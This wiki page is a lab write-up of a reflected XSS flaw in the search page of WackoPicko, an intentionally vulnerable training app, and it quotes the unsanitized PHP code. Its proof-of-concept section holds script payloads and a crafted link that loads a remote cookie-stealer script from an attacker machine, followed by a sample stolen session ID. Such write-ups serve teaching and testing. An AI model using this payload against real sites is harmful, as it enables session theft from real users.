WackoPicko/Reflected-XSS

From aldeid
Jump to: navigation, search
You are here:
Reflected XSS

Description

There is a XSS vulnerability on the search page, which is accessible without having to log into the application. In fact, the query parameter is not sanitized before being echoed to the user. The presence of the vulnerability can be tested by setting the query parameter to <script>alert(’xss’)</script>. When this string is reflected to the user, it will cause the browser to display an alert message. (Of course, an attacker would leverage the vulnerability to perform some malicious activity rather than alerting the victim.)

Click here for more information on XSS.

Proof of Concept

Enter some javascript (e.g. <script>alert('oops');</script>) in the search field and press ENTER. As you can see, the content hasn't been sanitized and our script is interpreted by the browser:

WackoPicko-reflected-xss.png

In an attack scenario, it is probable that an attacker would exploit this vulnerability to steal cookies. To test it, install a cookie stealer (small PHP script, e.g. http://xqus.com/php-cookie-stealer).

  • The attacker installs a cookie stealer on a remote machine (192.168.100.14)
  • The attacker sends a mail to the victim; the mail contains a malicious link that exploits the vulnerability:
http://192.168.100.18/pictures/search.php?query=%3Cscript+src%3D%22http://192.168.100.14/cookie_stealer.php%22%3E%3C/script%3E&x=33&y=10
  • The victim clicks on the link and sends, through his/her browser the content of the cookies
  • The attacker gathers the information contained in the cookies.txt file. Here is an example:
PHPSESSID=04ri9ifu7sjhgdddlmg9hthg95v3

How to detect

Some tools

How to protect against it?

Code

In pictures/search.php, we can see that the GET parameter is not sanitized before being sent back to the browser:

if (!isset($_GET['query']))
{
   http_redirect("/error.php?msg=Error, need to provide a query to search");
}

$pictures = Pictures::get_all_pictures_by_tag($_GET['query']);

?>

<?php our_header("", $_GET['query']); ?>

<div class="column prepend-1 span-24 first last">
<h2>Pictures that are tagged as '<?= $_GET['query']  ?>'</h2>

   <?php thumbnail_pic_list($pictures); ?>

</div>

The victim

Some wise advice:

  • Don't trust links in your mails: Never click or double-check (analyze the real link behind the href) links you receive in your mails

The developer

A vulnerability is the result of the developer's mistake. Vulnerabilities come from:

  • A lack of time during the development phase: Developers often have few days to develop an application. Under the pressure, mistakes and omissions are common.
  • Poor testing phase: Often, testing phase focuses on the application's functionalities more than on security issues. Don't forget to cover this part.
  • Lack of knowledge: Development is sometimes under the responsibility of beginners, which conducts to badly developed applications, especially for applications developed "from scratch". Use development frameworks that already implement security layers.

Comments

Talk:WackoPicko/Reflected-XSS